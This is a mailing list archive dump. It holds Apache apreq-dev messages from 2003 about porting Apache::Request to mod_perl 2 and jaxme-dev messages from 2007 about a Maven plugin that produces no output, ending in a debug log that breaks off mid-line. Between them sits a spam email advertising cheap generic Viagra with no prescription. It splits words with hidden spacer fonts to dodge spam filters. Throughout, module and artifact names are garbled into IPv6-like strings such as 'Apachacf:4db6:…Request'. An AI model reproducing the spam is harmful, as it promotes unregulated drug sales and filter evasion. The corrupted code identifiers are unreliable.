not a dropin replacement? I wish I were more learned in apache/mod_perl etc, as I would donate my time to the effort if I could be of any assistance. Alas... On 01/31, Stas Bekman said something like: > Shawn wrote: > >I'd be happy with some rough instructions for getting the CVS > >httpd-apreq-2 cvs working with my Apache/2.1.0-dev (Unix) > >mod_perl/1.99_09-dev Perl/v5.8.0. Would I somehow use the perl stuff > >from .51 or .60RC? > > > >I just want to get Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bGallery working. It's been an obsession. So > >far, this is the only stuff it needs, as I can see. > > > >use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest(); > >my $r = shift or Apache->request(); > >my $apr = Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest->instance($r, DISABLE_UPLOADS => 1, POST_MAX => > >1024); > >Apache->request->log_error("Something was fishy with the type of the file > >$file\n"); > > While things aren't available, you can use CGI.pm instead. > __________________________________________________________________ > Stas Bekman JAm_pH ------> Just Another mod_perl Hacker > http://stason.org/ mod_perl Guide ---> http://perl.apache.org > mailto:[email protected] http://use.perl.org http://apacheweek.com > http://modperlbook.org http://apache.org http://ticketmaster.com > -- Shawn Leas [email protected] Sponges grow in the ocean... that *kills* me. I wonder how much deeper they'd be if that didn't happen. -- Stephen Wright From [email protected] Fri Jan 31 23:36:31 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84628 invoked by uid 500); 31 Jan 2003 23:36:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 84616 invoked from network); 31 Jan 2003 23:36:30 -0000 Message-ID: <[email protected]> Date: Sat, 01 Feb 2003 10:35:12 +1100 From: Stas Bekman <[email protected]> Organization: Hope, Humanized User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Shawn <[email protected]> Cc: [email protected] Subject: Re: Help with httpd-apreq-2 cvs? References: <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Shawn wrote: > I take it something like this would be a porting effort, and not a > dropin replacement? No, Apache was totally rewritten, with a totally new API and it requires to port all other things depending on it. > I wish I were more learned in apache/mod_perl etc, as I would donate my > time to the effort if I could be of any assistance. It's never too late to learn and help. > Alas... > > On 01/31, Stas Bekman said something like: > >>Shawn wrote: >> >>>I'd be happy with some rough instructions for getting the CVS >>>httpd-apreq-2 cvs working with my Apache/2.1.0-dev (Unix) >>>mod_perl/1.99_09-dev Perl/v5.8.0. Would I somehow use the perl stuff >> >>>from .51 or .60RC? >> >>>I just want to get Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bGallery working. It's been an obsession. So >>>far, this is the only stuff it needs, as I can see. >>> >>>use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest(); >>>my $r = shift or Apache->request(); >>>my $apr = Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest->instance($r, DISABLE_UPLOADS => 1, POST_MAX => >>>1024); >>>Apache->request->log_error("Something was fishy with the type of the file >>>$file\n"); >> >>While things aren't available, you can use CGI.pm instead. >>__________________________________________________________________ >>Stas Bekman JAm_pH ------> Just Another mod_perl Hacker >>http://stason.org/ mod_perl Guide ---> http://perl.apache.org >>mailto:[email protected] http://use.perl.org http://apacheweek.com >>http://modperlbook.org http://apache.org http://ticketmaster.com >> > > -- > Shawn Leas > [email protected] > > Sponges grow in the ocean... that *kills* me. I wonder how much deeper > they'd be if that didn't happen. > -- Stephen Wright -- __________________________________________________________________ Stas Bekman JAm_pH ------> Just Another mod_perl Hacker http://stason.org/ mod_perl Guide ---> http://perl.apache.org mailto:[email protected] http://use.perl.org http://apacheweek.com http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Fri Jan 31 23:38:53 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 85504 invoked by uid 500); 31 Jan 2003 23:38:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 85490 invoked from network); 31 Jan 2003 23:38:53 -0000 To: Stas Bekman <[email protected]> Cc: apreq list <[email protected]> Subject: Re: [proposal] 1.2 release References: <[email protected]> <[email protected]> From: Joe Schaefer <[email protected]> Date: 31 Jan 2003 18:45:50 -0500 In-Reply-To: Stas Bekman's message of "Sat, 01 Feb 2003 09:30:09 +1100" Message-ID: <[email protected]> Lines: 13 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Stas Bekman <[email protected]> writes: > Joe Schaefer wrote: > > > Thanks for your patience, folks. > > Thanks Joe! Oops, I forgot an important one that's been sitting in my queue for months: get the "req->nargs" patch in for the tcl guys. -- Joe Schaefer
From [email protected] Mon Jun 23 09:02:29 2003 Return-Path: <[email protected]> Mailing-List: contact [email protected]; run by ezmlm Delivered-To: mailing list [email protected] Received: (qmail 70572 invoked from network); 23 Jun 2003 09:02:29 -0000 Received: from unknown (HELO faqrtnb) (161.129.204.104) by daedalus.apache.org with SMTP; 23 Jun 2003 09:02:29 -0000 To: [email protected] From: "Ron Miller " <[email protected]> Subject: |Generic Viagra is cheaper!| .fe X-Priority: 1 Reply-To: [email protected] In-reply-To: [email protected] X-Mailer: Mggal (ver. 4.52) Message-ID: < [email protected] > Received: from 161.129.204.104 by 8MSb id Wz-Ac8v for <[email protected]> Date: Mon, 23 Jun 2003 03:02:33 +0200 References: 3057$650575@5 X-Originating-IP: [161.129.204.104] X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 X-OriginalArrivalTime: Mon, 23 Jun 2003 03:02:33 +1000 FILETIME=[4:9147] X-MSMail-Priority: High X-AntiAbuse: This header was added to track abuse, please include it with any abuse report X-AntiAbuse: Primary Hostname - 161.129.204.104 X-AntiAbuse: Originator/Caller UID/GID - [9 1] / [1 0] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.92; en-US; rv:9.7) Gecko/53.0 X-Originating-Host: [161.129.204.104]; Mon, 23 Jun 2003 03:02:33 -0600 X-Owner: vAPz X-Scanner: exiscan for exim4 (http://duncanthrax.net/exiscan/) *gG4-cnfSsSMQ-u* Mime-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_004_0034_PYKDFJSI.ILMMKVOX" X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N ------=_NextPart_004_0034_PYKDFJSI.ILMMKVOX Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8 bit ------=_NextPart_004_0034_PYKDFJSI.ILMMKVOX Content-Type: text/html; charset="ISO-8859-1" Content-Transfer-Encoding: 8 bit <html> <head> <title>Buy Generic Sildenafil Citrate Online (the active ingredient in V</title> </head> <body bgcolor="#f5f5f5"> <br><i>072</i> ay<i> u9</i><br> <center> <table cellpadding="4" cellspacing="1" width="500" bgcolor="black"> <tr> <td bgcolor="#0076b0"><font face="Verdana, Arial, Helvetica, sans-serif" size="6" color="#f8b262"><b>Generic</b></font><font face="Verdana, Arial, Helvetica, sans-serif" size="6" color="white"><b> V<font size=0>&nbsp;</font>i<font size=0>&nbsp;</font>a<font size=0>&nbsp;</font>g<font size=0>&nbsp;</font>r<font size=0>&nbsp;</font>a</b></font><font face="Verdana, Arial, Helvetica, sans-serif" color="white" size="2"><b><br> </b></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="black"><b></b></font></td> </tr> <tr> <td bgcolor="#cccccc"> <div align="right"> <font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#cccccc">.</font></div> </td> </tr> <tr> <td valign="top" align="left" bgcolor="white"> <div align="left"> <br> Generic Sildenafil Citrate 100mg tablets (GSC-100) and V<font size=0>&nbsp;</font>i<font size=0>&nbsp;</font>a<font size=0>&nbsp;</font>g<font size=0>&nbsp;</font>r<font size=0>&nbsp;</font>a&reg; 100mg both<br> contain 100mg of Sildenafil Citrate. The only difference is that the generic is half the price.<br> <br> </div> <div align="center"> <table border="0" cellpadding="2" cellspacing="1" width="462" bgcolor="silver"> <tr> <td width="119" bgcolor="#ececec" valign="top"><b>Product:</b></td> <td width="171" bgcolor="#f5f5f5" valign="top"> <div align="center"> <b>Generic Sildenafil Citrate<br> </b>&nbsp;(GSC-100) <p>100mg Sildenafil Citrate<br> <br> </p> </div> </td> <td width="156" bgcolor="#ececec" valign="top"> <div align="center"> <b>V<font size=0>&nbsp;</font>i<font size=0>&nbsp;</font>a<font size=0>&nbsp;</font>g<font size=0>&nbsp;</font>r<font size=0>&nbsp;</font>a&reg; <br> </b> <p><b><br> </b>100mg Sildenafil Citrate<br> <br> </p> </div> </td> </tr> <tr> <td width="119" bgcolor="#ececec" valign="top"><b>Cost:</b></td> <td bgcolor="#f5f5f5" width="171">As low as $5.00 US per 100mg tablet</td> <td width="156" bgcolor="#ececec" valign="top">$12.25 US per 100mg tablet</td> </tr> <tr> <td width="119" bgcolor="#ececec" valign="top"><b>Physician Consultation:</b></td> <td width="171" bgcolor="#f5f5f5" valign="top">$0.00</td> <td width="156" bgcolor="#ececec">$75.00 - $100.00 doctors visit</td> </tr> <tr> <td width="119" bgcolor="#ececec" valign="top"><b>Convenience:</b></td> <td width="171" bgcolor="#f5f5f5" valign="top">10 minute online consultation</td> <td width="156" bgcolor="#ececec">Dr. appointment - 1 to 2 hours<br>Pharmacy Visit - 30 min. to 1 hour</td> </tr> <tr> <td width="119" bgcolor="#ececec"><b>100% Money Back G<font size=0>&nbsp;</font>u<font size=0>&nbsp;</font>a<font size=0>&nbsp;</font>r<font size=0>&nbsp;</font>a<font size=0>&nbsp;</font>n<font size=0>&nbsp;</font>t<font size=0>&nbsp;</font>e<font size=0>&nbsp;</font>e:</b></td> <td width="171" bgcolor="#f5f5f5">Yes, the first pharmaceutical ever G<font size=0>&nbsp;</font>u<font size=0>&nbsp;</font>a<font size=0>&nbsp;</font>r<font size=0>&nbsp;</font>a<font size=0>&nbsp;</font>n<font size=0>&nbsp;</font>t<font size=0>&nbsp;</font>e<font size=0>&nbsp;</font>ed</td> <td width="156" bgcolor="#ececec" valign="top">NO</td> </tr> <tr> <td width="119" bgcolor="#ececec" valign="top"><b>Delivery:</b></td> <td width="171" bgcolor="#f5f5f5">Fast, F<font size=0>&nbsp;</font>R<font size=0>&nbsp;</font>E<font size=0>&nbsp;</font>E shipping</td> <td width="156" bgcolor="#ececec">When can your doctor see you?</td> </tr> </table> <br> <b><font size="5"><a href="http://[email protected]/host/default.asp?ID=027">Visit Our Web Site for More Details</a></font></b> <p>Why pay twice as much when GSC-100 is <br> the same thing and is only a c<font size=0>&nbsp;</font>l<font size=0>&nbsp;</font>i<font size=0>&nbsp;</font>c<font size=0>&nbsp;</font>k away?<br> </p> </div> </td> </tr> <tr> <td bgcolor="#fba501"> <div align="center"> <font color="white"> <br> <br> 100% Money Back G<font size=0>&nbsp;</font>u<font size=0>&nbsp;</font>a<font size=0>&nbsp;</font>r<font size=0>&nbsp;</font>a<font size=0>&nbsp;</font>n<font size=0>&nbsp;</font>t<font size=0>&nbsp;</font>e<font size=0>&nbsp;</font>e - The First Pharmaceutical to ever be G<font size=0>&nbsp;</font>u<font size=0>&nbsp;</font>a<font size=0>&nbsp;</font>r<font size=0>&nbsp;</font>a<font size=0>&nbsp;</font>n<font size=0>&nbsp;</font>t<font size=0>&nbsp;</font>e<font size=0>&nbsp;</font>ed<br> </font><font size="1" color="white"><br> </font></div> </td> </tr> </table> </body> <br><font face="tahoma" size="1">You are recieving this email because you or someone has subscribed to this opt in/out user list. Please <a href="http://[email protected]/unsubscribe.php">click here</a> to be removed, thank you!</font> <br><i>872265</i> osjzf<i> up</i><br> </html> ------=_NextPart_004_0034_PYKDFJSI.ILMMKVOX--
From [email protected] Thu Aug 02 15:48:04 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33212 invoked from network); 2 Aug 2007 15:48:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Aug 2007 15:48:03 -0000 Received: (qmail 40754 invoked by uid 500); 2 Aug 2007 15:48:02 -0000 Delivered-To: [email protected] Received: (qmail 40740 invoked by uid 500); 2 Aug 2007 15:48:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 40730 invoked by uid 99); 2 Aug 2007 15:48:02 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 02 Aug 2007 08:48:02 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.kivasystems.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 02 Aug 2007 15:47:57 +0000 Received: from localhost (unknown [161.129.204.104]) by mail.kivasystems.com (Postfix) with ESMTP id D211B2CB34 for <[email protected]>; Thu, 2 Aug 2007 11:47:36 -0400 (EDT) X-Virus-Scanned: [email protected] Received: from mail.kivasystems.com ([161.129.204.104]) by localhost (ameisenhugel.kivasystems.com [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id Vi2zdzkujiUN for <[email protected]>; Thu, 2 Aug 2007 11:47:29 -0400 (EDT) Received: from [161.129.204.104] (moya.kivasystems.com [161.129.204.104]) (using SSLv3 with cipher RC4-MD5 (128/128 bits)) (No client certificate requested) by mail.kivasystems.com (Postfix) with ESMTP id 114372CB8E for <[email protected]>; Thu, 2 Aug 2007 11:47:28 -0400 (EDT) Subject: trouble with generating sources From: Joshua ChaitinPollak <[email protected]> Reply-To: [email protected] To: [email protected] Content-Type: text/plain Organization: Kiva Systems Date: Thu, 02 Aug 2007 11:47:19 -0400 Message-Id: <[email protected]> Mime-Version: 1.0 X-Mailer: Evolution 2.10.1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org hello, We currently use ant and jaxbe in our project, but I'm switching us to maven and because of the simplicity of using jaxme with maven, I'm trying to switch to jaxme to. I have the following in my pom.xml, but when I run "mvn jaxme:jaxme" I get no output and no errors. Please help! This in the POM: <plugin> <groupId>org.apache.ws.jaxme</groupId> <artifactId>maven-jaxme-plugin</artifactId> <executions> <execution> <goals> <goal>jaxme</goal> </goals> </execution> </executions> <configuration> <bindings> <value>datadefs/bindings.xjb</value> </bindings> <schemas> <schema>datadefs/main.xsd</schema> </schemas> </configuration> </plugin> Gets me this: jpollak@moya:~/src/software/java/trunk$ mvn jaxme:jaxme [INFO] Scanning for projects... [INFO] Searching repository for plugin with prefix: 'jaxme'. [INFO] ---------------------------------------------------------------------------- [INFO] Building Unnamed - com.kiva:MHS:jar:0.0.1 [INFO] task-segment: [jaxme:jaxme] [INFO] ---------------------------------------------------------------------------- [INFO] [jaxme:jaxme] [INFO] ------------------------------------------------------------------------ [INFO] BUILD SUCCESSFUL [INFO] ------------------------------------------------------------------------ [INFO] Total time: 2 seconds [INFO] Finished at: Thu Aug 02 11:46:36 EDT 2007 [INFO] Final Memory: 4M/8M [INFO] ------------------------------------------------------------------------ Any help would be appreciated, thanks! -Josh --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Aug 02 15:52:46 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 42306 invoked from network); 2 Aug 2007 15:52:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Aug 2007 15:52:45 -0000 Received: (qmail 55535 invoked by uid 500); 2 Aug 2007 15:52:44 -0000 Delivered-To: [email protected] Received: (qmail 55518 invoked by uid 500); 2 Aug 2007 15:52:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 55509 invoked by uid 99); 2 Aug 2007 15:52:44 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 02 Aug 2007 08:52:44 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nf-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 02 Aug 2007 15:52:37 +0000 Received: by nf-out-0910.google.com with SMTP id e27so158595nfd for <[email protected]>; Thu, 02 Aug 2007 08:52:16 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:cc:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=tNist7pTJfLN4G5dgLPjR6aYW1ZJr2P74JICsJfcP1X50R1fRVwF94KRysojAmtmACA1FbbngqycY91tCH58oTWtf+uxXAV4MS9bXF1Lcned77IOnMBqimTWACbZa6CXw85ba9VBO/9P+bfd9/7bRt3UjmBZMuApof/JkcYfNHw= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:cc:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=cTSqy5zB359hDOoY/vUXQ+HCcPsDb2htL2Rhu6OxcZfQcAHBfKzOpMR3L9GU9pYCPqUSegsDxcYwpdRkkWN71s/u6ANUcmY85bBdN/Mwp/OCKPKjf4pQdMuP57AT7Rg7kACMXMobsTwiQfZ1oU+J/PiS7/kfzlEe5jYcrA/DvRw= Received: by 161.129.204.104 with SMTP id m4mr1484383fgb.1186069936144; Thu, 02 Aug 2007 08:52:16 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Thu, 2 Aug 2007 08:52:16 -0700 (PDT) Message-ID: <[email protected]> Date: Thu, 2 Aug 2007 17:52:16 +0200 From: "Jochen Wiedmann" <[email protected]> To: [email protected] Subject: Re: trouble with generating sources Cc: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Could you please post the output of "mvn -X jaxme:jaxme"? Thanks! -- "Besides, manipulating elections is under penalty of law, resulting in a preventative effect against manipulating elections. The german government justifying the use of electronic voting machines and obviously believing that we don't need a police, because all illegal actions are forbidden. http://dip.bundestag.de/btd/16/051/1605194.pdf --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Aug 02 17:31:10 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9333 invoked from network); 2 Aug 2007 17:31:09 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Aug 2007 17:31:09 -0000 Received: (qmail 52381 invoked by uid 500); 2 Aug 2007 17:31:09 -0000 Delivered-To: [email protected] Received: (qmail 52361 invoked by uid 500); 2 Aug 2007 17:31:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 52352 invoked by uid 99); 2 Aug 2007 17:31:09 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 02 Aug 2007 10:31:09 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.kivasystems.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 02 Aug 2007 17:31:03 +0000 Received: from localhost (unknown [161.129.204.104]) by mail.kivasystems.com (Postfix) with ESMTP id 91DD42CBAE for <[email protected]>; Thu, 2 Aug 2007 13:30:41 -0400 (EDT) X-Virus-Scanned: [email protected] Received: from mail.kivasystems.com ([161.129.204.104]) by localhost (ameisenhugel.kivasystems.com [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id Tkj2nb-RLuPC for <[email protected]>; Thu, 2 Aug 2007 13:30:34 -0400 (EDT) Received: from [161.129.204.104] (moya.kivasystems.com [161.129.204.104]) (using SSLv3 with cipher RC4-MD5 (128/128 bits)) (No client certificate requested) by mail.kivasystems.com (Postfix) with ESMTP id 648F32CBBC for <[email protected]>; Thu, 2 Aug 2007 13:30:33 -0400 (EDT) Subject: Re: trouble with generating sources From: Joshua ChaitinPollak <[email protected]> Reply-To: [email protected] To: jaxme-dev <[email protected]> In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Content-Type: text/plain Organization: Kiva Systems Date: Thu, 02 Aug 2007 13:30:24 -0400 Message-Id: <[email protected]> Mime-Version: 1.0 X-Mailer: Evolution 2.10.1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org On Thu, 2007-08-02 at 17:52 +0200, Jochen Wiedmann wrote: > Could you please post the output of "mvn -X jaxme:jaxme"? Thanks! Of course! Let me know if anything else is needed! -Josh jpollak@moya:~/src/software/java/trunk$ mvn -X jaxme:jaxme + Error stacktraces are turned on. Maven version: 2.0.7 Java version: 1.5.0_11 OS name: "linux" version: "2.6.20-16-generic" arch: "i386" [DEBUG] Building Maven user-level plugin registry from: '/home/jpollak/.m2/plugin-registry.xml' [DEBUG] Building Maven global-level plugin registry from: '/usr/local/maven-2.0.7/conf/plugin-registry.xml' [INFO] Scanning for projects... [INFO] Searching repository for plugin with prefix: 'jaxme'. [DEBUG] Loading plugin prefixes from group: org.apache.maven.plugins [DEBUG] Loading plugin prefixes from group: org.codehaus.mojo [DEBUG] maven-compiler-plugin: resolved to version 2.0.2 from repository central [DEBUG] Retrieving parent-POM: org.apache.maven.plugins:maven-pluginsacf:4db6:5e0b:f386:43a5:35d7:718d:3c8b for project: null:maven-compiler-plugin:maven-plugin:2.0.2 from the repository. [DEBUG] Retrieving parent-POM: org.apache.maven:maven-parentacf:4db6:5e0b:f386:43a5:35d7:718d:3c8b for project: org.apache.maven.plugins:maven-plugins:pom:8 from the repository. [DEBUG] Retrieving parent-POM: org.apache:apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8b3 for project: org.apache.maven:maven-parent:pom:5 from the repository. [DEBUG] maven-jaxme-plugin: resolved to version 1.0.3 from repository central [INFO] ---------------------------------------------------------------------------= - [INFO] Building Unnamed - com.kiva:MHS:jar:0.0.1 [INFO] task-segment: [jaxme:jaxme] [INFO] ---------------------------------------------------------------------------= - [DEBUG] com.kiva:MHS:jar:0.0.1 (selected for null) [DEBUG] com.jamonapi:jamon:jar:2.0:compile (selected for compile) [DEBUG] oro:oro:jar:2.0.8:compile (selected for compile) [DEBUG] javax.servlet:servlet-api:jar:2.3:compile (selected for compile) [DEBUG] commons-collections:commons-collections:jar:3.1:compile (selected for compile) [DEBUG] commons-dbcp:commons-dbcp:jar:1.2.1:compile (selected for compile) [DEBUG] commons-collections:commons-collections:jar:2.1:compile (removed - nearer found: 3.1) [DEBUG] commons-pool:commons-pool:jar:1.2:compile (selected for compile) [DEBUG] commons-collections:commons-collections:jar:2.1:compile (removed - nearer found: 3.1) [DEBUG] While downloading xml-apis:xml-apis:2.0.2 This artifact has been relocated to xml-apis:xml-apis:1.0.b2. [DEBUG] xml-apis:xml-apis:jar:1.0.b2:compile (selected for compile) [DEBUG] While downloading xerces:xerces:2.0.2 This artifact has been relocated to xerces:xercesImpl:2.0.2. [DEBUG] xerces:xercesImpl:jar:2.0.2:compile (selected for compile) [DEBUG] While downloading xml-apis:xml-apis:2.0.2 This artifact has been relocated to xml-apis:xml-apis:1.0.b2. [DEBUG] xml-apis:xml-apis:jar:1.0.b2:compile (selected for compile) [DEBUG] While downloading xerces:xerces:2.0.2 This artifact has been relocated to xerces:xercesImpl:2.0.2. [DEBUG] xerces:xercesImpl:jar:2.0.2:compile (selected for compile) [DEBUG] commons-dbutils:commons-dbutils:jar:1.1:compile (selected for compile) [DEBUG] commons-logging:commons-logging:jar:1.1:compile (selected for compile) [DEBUG] log4j:log4j:jar:1.2.12:compile (selected for compile) [DEBUG] logkit:logkit:jar:1.0.1:compile (selected for compile) [DEBUG] avalon-framework:avalon-framework:jar:4.1.3:compile (selected for compile) [DEBUG] commons-math:commons-math:jar:1.0:compile (selected for compile) [DEBUG] commons-logging:commons-logging:jar:1.0.3:compile (removed - nearer found: 1.1) [DEBUG] commons-discovery:commons-discovery:jar:0.2:compile (selected for compile) [DEBUG] commons-logging:commons-logging:jar:1.0.3:compile (removed - nearer found: 1.1) [DEBUG] commons-net:commons-net:jar:1.3.0:compile (selected for compile) [DEBUG] commons-pool:commons-pool:jar:1.2:compile (selected for compile) [DEBUG] commons-collections:commons-collections:jar:2.1:compile (removed - nearer found: 3.1) [DEBUG] While downloading xml-apis:xml-apis:2.0.2 This artifact has been relocated to xml-apis:xml-apis:1.0.b2. [DEBUG] While downloading xerces:xerces:2.0.2 This artifact has been relocated to xerces:xercesImpl:2.0.2. [DEBUG] jline:jline:jar:0.9.9:compile (selected for compile) [DEBUG] junit:junit:jar:3.8.1:compile (selected for compile) [DEBUG] log4j:log4j:jar:1.2.12:compile (removed - nearer found: 1.2.14) [DEBUG] log4j:log4j:jar:1.2.14:compile (selected for compile) [DEBUG] mysql:mysql-connector-java:jar:3.1.12:compile (selected for compile) [DEBUG] org.springframework:spring:jar:2.0.2:compile (selected for compile) [DEBUG] oro:oro:jar:2.0.8:compile (selected for compile) [DEBUG] javax.mail:mail:jar:1.3.3:compile (selected for compile) [DEBUG] javax.activation:activation:jar:1.0.2:compile (selected for compile) [DEBUG] org.apache.ws.jaxme:maven-jaxme-plugin:maven-plugin:1.0.3:runtime (selected for runtime) [DEBUG] Retrieving parent-POM: plexus:plexus-rootacf:4db6:5e0b:f386:43a5:35d7:718d:3c8b.0.3 for project: plexus:plexus-utils:jar:1.0.3 from the repository. [DEBUG] plexus:plexus-utils:jar:1.0.3:runtime (selected for runtime) [DEBUG] Retrieving parent-POM: org.codehaus.plexus:plexusacf:4db6:5e0b:f386:43a5:35d7:718d:3c8b.0.4 for project: null:plexus-utils:jar:1.1 from the repository. [DEBUG] org.codehaus.plexus:plexus-utils:jar:1.1:runtime (selected for runtime) [DEBUG] org.apache.ws.jaxme:jaxme2:jar:0.5.1:runtime (selected for runtime) [DEBUG] org.apache.ws.jaxme:jaxmeapi:jar:0.5.1:runtime (selected for runtime) [DEBUG] org.apache.ws.jaxme:jaxmexs:jar:0.5.1:runtime (selected for runtime) [DEBUG] org.apache.ws.jaxme:jaxmejs:jar:0.5.1:runtime (selected for runtime) [DEBUG] Retrieving parent-POM: org.apache.maven:mavenacf:4db6:5e0b:f386:43a5:35d7:718d:3c8b.0 for project: null:maven-project:jar:2.0 from the repository. [DEBUG] Adding managed dependencies for unknown:maven-project [DEBUG] org.codehaus.plexus:plexus-container-default:jar:1.0-alpha-8 [DEBUG] org.codehaus.plexus:plexus-utils:jar:1.0.4 [DEBUG] org.apache.maven.wagon:wagon-provider-api:jar:1.0-alpha-5 [DEBUG] org.apache.maven.wagon:wagon-ssh:jar:1.0-alpha-5 [DEBUG] org.apache.maven.wagon:wagon-file:jar:1.0-alpha-5 [DEBUG] org.apache.maven.wagon:wagon-http-lightweight:jar:1.0-alpha-5 [DEBUG] org.apache.maven:maven-project:jar:2.0:runtime (selected for runtime) [DEBUG] Adding managed dependencies for unknown:maven-profile [DEBUG] org.codehaus.plexus:plexus-container-default:jar:1.0-alpha-8 [DEBUG] org.codehaus.plexus:plexus-utils:jar:1.0.4 [DEBUG] org.apache.maven.wagon:wagon-provider-api:jar:1.0-alpha-5 [DEBUG] org.apache.maven.wagon:wagon-ssh:jar:1.0-alpha-5 [DEBUG] org.apache.maven.wagon:wagon-file:jar:1.0-alpha-5 [DEBUG] org.apache.maven.wagon:wagon-http-lightweight:jar:1.0-alpha-5 [DEBUG] org.apache.maven:maven-profile:jar:2.0:runtime (selected for runtime) [DEBUG] Adding managed dependencies for org.apache.maven:maven-model [DEBUG] org.codehaus.plexus:plexus-container-default:jar:1.0-alpha-8 [DEBUG] org.codehaus.plexus:plexus-utils:jar:1.0.4 [DEBUG] org.apache.maven.wagon:wagon-provider-api:jar:1.0-alpha-5 [DEBUG] org.apache.maven.wagon:wagon-ssh:jar:1.0-alpha-5 [DEBUG] org.apache.maven.wagon:wagon-file:jar:1.0-alpha-5 [DEBUG] org.apache.maven.wagon:wagon-http-lightweight:jar:1.0-alpha-5 [DEBUG] org.apache.maven:maven-model:jar:2.0:runtime (selected for runtime) [DEBUG] org.codehaus.plexus:plexus-utils:jar:1.0.4:runtime (removed - nearer found: 